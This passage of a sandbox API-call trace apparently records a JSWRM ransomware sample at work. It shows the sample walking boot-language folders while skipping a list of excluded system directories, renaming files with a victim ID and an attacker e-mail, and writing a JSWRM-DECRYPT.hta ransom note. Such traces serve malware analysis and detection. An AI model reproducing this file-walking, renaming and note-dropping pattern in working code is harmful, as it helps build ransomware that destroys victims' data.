hHeap=0x1e0000) returned 1 [0064.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.084] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.084] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0064.084] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.085] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.085] CloseHandle (hObject=0xffffffff) returned 1 [0064.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0064.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0064.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0064.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226630 [0064.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0064.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0064.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226630 | out: hHeap=0x1e0000) returned 1 [0064.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.085] MoveFileW (lpExistingFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0064.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.086] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cda66b4, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cda66b4, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cda66b4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0064.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0064.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0064.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0064.086] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.086] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.086] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.086] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.086] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.087] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.087] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.087] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.087] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.087] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.087] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0064.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0064.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0064.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0064.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.087] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.087] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0064.087] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.087] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.087] CloseHandle (hObject=0xffffffff) returned 1 [0064.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0064.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0064.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0064.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0064.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0064.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0064.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0064.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.088] MoveFileW (lpExistingFileName="C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\pt-BR\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0064.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.088] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.088] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0064.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0064.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.088] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0064.088] lstrcmpiW (lpString1="pt-PT", lpString2=".") returned 1 [0064.088] lstrcmpiW (lpString1="pt-PT", lpString2="..") returned 1 [0064.088] lstrcmpiW (lpString1="pt-PT", lpString2="...") returned 1 [0064.088] lstrcmpiW (lpString1="pt-PT", lpString2="windows") returned -1 [0064.088] lstrcmpiW (lpString1="pt-PT", lpString2="recovery") returned -1 [0064.088] lstrcmpiW (lpString1="pt-PT", lpString2="perflogs") returned 1 [0064.088] lstrcmpiW (lpString1="pt-PT", lpString2="documents and settings") returned 1 [0064.088] lstrcmpiW (lpString1="pt-PT", lpString2="$RECYCLE.BIN") returned 1 [0064.089] lstrcmpiW (lpString1="pt-PT", lpString2="system volume information") returned -1 [0064.089] lstrcmpiW (lpString1="pt-PT", lpString2="msocache") returned 1 [0064.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0064.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0064.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237268 [0064.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.089] GetFileAttributesW (lpFileName="C:\\Boot\\pt-PT\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\pt-pt\\jswrm-decrypt.hta")) returned 0xffffffff [0064.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237268 | out: hHeap=0x1e0000) returned 1 [0064.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0064.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0064.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0064.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.090] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\pt-pt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.090] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.091] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.091] CloseHandle (hObject=0x450) returned 1 [0064.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0064.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0064.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0064.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2374e8 [0064.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.093] GetFileAttributesW (lpFileName="C:\\Boot\\pt-PT\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\pt-pt\\jswrm-decrypt.hta")) returned 0x20 [0064.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2374e8 | out: hHeap=0x1e0000) returned 1 [0064.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.093] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cdcc9ae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0064.093] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.093] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cdcc9ae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.093] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.093] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.093] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.093] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.093] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.093] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.094] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.094] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.094] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.094] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.094] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.094] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.094] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0064.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 